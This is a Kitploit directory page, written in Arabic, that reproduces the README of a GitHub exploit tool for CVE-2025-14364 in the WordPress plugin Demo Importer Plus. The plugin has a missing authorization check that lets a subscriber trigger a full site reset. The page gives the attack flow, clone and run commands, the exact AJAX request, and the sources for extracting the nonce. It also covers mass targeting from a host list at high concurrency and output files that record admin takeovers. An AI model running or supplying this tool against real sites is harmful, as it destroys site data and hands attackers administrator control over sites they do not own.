Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-14364 — Demo Importer Plus <= 2.0.8 - نقص التفويض لإعادة تعيين الموقع وتصعيد الامتيازات للمستخدمين الموثوقين (مشترك+) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-14364
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-14364

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - نقص التفويض لإعادة تعيين الموقع وتصعيد الامتيازات للمستخدمين الموثوقين (مشترك+)

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - نقص في التفويض يؤدي إلى إعادة تعيين الموقع وتصعيد الامتيازات للمستخدمين المصادقين (مشترك+)

CVE-2025-14364 — Demo Importer Plus · إعادة تعيين كامل للموقع → تصعيد الامتيازات

root@kitploit:~
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   /_ \_/ /_  _)    |   |  _) |_)  |

مشترك مصادق → مدير عبر إجراء AJAX do-reinstall


CVE CVSS Plugin Auth Python Platform Author


〔 1 〕 الثغرة

السبب الجذري:
Ajax::handle_request() تسجل إجراء AJAX demo_importer_plus دون استدعاء current_user_can(). يمكن لأي مشترك مصادَق إرسال {"demo_action":"do-reinstall"} لتشغيل wp_install()، مما يؤدي إلى حذف جميع جداول قاعدة البيانات (باستثناء users / usermeta) وإعادة تشغيل إعداد ووردبريس — مما يعين تلقائيًا دور المدير للحساب المهاجم في هذه العملية.


〔 2 〕 سير الهجوم

root@kitploit:~
Mode 1 — Diagnose
  Probe: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Identify live WordPress targets

Mode 2 — Register
  POST /wp-login.php?action=register
  → Create subscriber account
  → Activation email sent to inbox
     ↳ You MUST click the email link before running Mode 3

Mode 3 — Exploit
  POST /wp-login.php                         → Authenticate as subscriber
  GET  /wp-admin/                            → Extract wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → Trigger full site reset
  ← Response: "Site has been reset successfully"
  → Attacking account now holds Administrator role

〔 3 〕 الإعداد

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py

requirements.txt

root@kitploit:~
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0

〔 4 〕 الاستخدام

root@kitploit:~
Mode [1/2/3]:           1 = Diagnose   2 = Register   3 = Exploit
Targets file:           list.txt  (one host per line)
Concurrency:            default 30, max 200
Timeout:                default 10s

تنسيق الأهداف — list.txt:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

► الوضع 1 · تشخيص

يفحص أربعة نقاط نهاية لكل مضيف ويكتب النتائج النظيفة.

root@kitploit:~
Mode: 1

Output → diagnostics_results.txt · passed_targets.txt


► الوضع 2 · تسجيل

root@kitploit:~
Mode: 2
Email:    [email protected]
Username: Nxploited
Password: NxploitedSA

تحقق من صندوق الوارد وانقر على رابط التفعيل قبل تشغيل الوضع 3.

Output → register_results.txt


► الوضع 3 · استغلال

root@kitploit:~
Mode: 3
Username: Nxploited
Password: NxploitedSA

عند النجاح، تقوم الأداة بطباعة:

root@kitploit:~
[HH:MM:SS] SUCCESS  "success":true,"message":"Site has been reset successfully" -> https://target.com

ويكتب إلى exploit_results.txt:

root@kitploit:~
https://target.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin

〔 5 〕 ملفات الإخراج


〔 6 〕 التفاصيل التقنية

الطلب المعرض للثغرة:

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>

{"demo_action":"do-reinstall"}

الاستجابة الناجحة:

root@kitploit:~
{"success": true, "data": {"message": "Site has been reset successfully"}}

استخراج nonce — مصدران احتياطيان:

root@kitploit:~
wpApiSettings.nonce              (from /wp-admin/ page source)
elementorOneSettingsData.wpRestNonce   (fallback)

〔 7 〕 المؤلف والاتصال

root@kitploit:~
By   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited

GitHub Telegram


〔 8 〕 إخلاء المسؤولية

root@kitploit:~
تم إصدار هذا البرنامج بدقة لأغراض البحث الأمني والتعليم.

المؤلف لا يتحمل أي مسؤولية عن أي إجراءات يتم اتخاذها باستخدام هذه الأداة
ضد أنظمة لا يملكها المشغل أو ليس لديه إذن كتابي صريح لاختبارها.

الاستخدام غير المصرح به ضد أنظمة الطرف الثالث ينتهك قوانين جرائم الكمبيوتر
في معظم الولايات القضائية (CFAA، CMA، وما يعادلها في جميع أنحاء العالم) وقد يؤدي
إلى الملاحقة الجنائية.

أنت وحدك المسؤول عن ضمان حصولك على الإذن القانوني
قبل تشغيل هذه الأداة ضد أي هدف.

© 2025 Nxploited · بحث أمني فقط · Demo Importer Plus ≤ 2.0.8 · تم الإصلاح في الإصدار 2.0.9
تنزيل الأداة
CVECVE-2025-14364
CVSS v3.18.8 HIGH — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
الإضافةDemo Importer Plus
الإصدارات المتأثرةجميع الإصدارات ≤ 2.0.8
التفويض المطلوبمشترك (أدنى دور مسجل)
النوعالتحقق من الصلاحية المفقود → إعادة تعيين كامل للموقع → تصعيد الامتيازات
CWECWE-862 · التفويض المفقود
الملفالمحتوى
diagnostics_results.txtبيانات JSON كاملة للفحص لكل هدف
passed_targets.txtالأهداف النظيفة (لم يتم اكتشاف أخطاء)
register_results.txtسجلات محاولات التسجيل
exploit_results.txtتسجيل الدخول · nonce · نتائج إعادة التعيين · إصابات مدير مؤكدة
reset_results.txtاستجابة خام لـ do-reinstall لكل هدف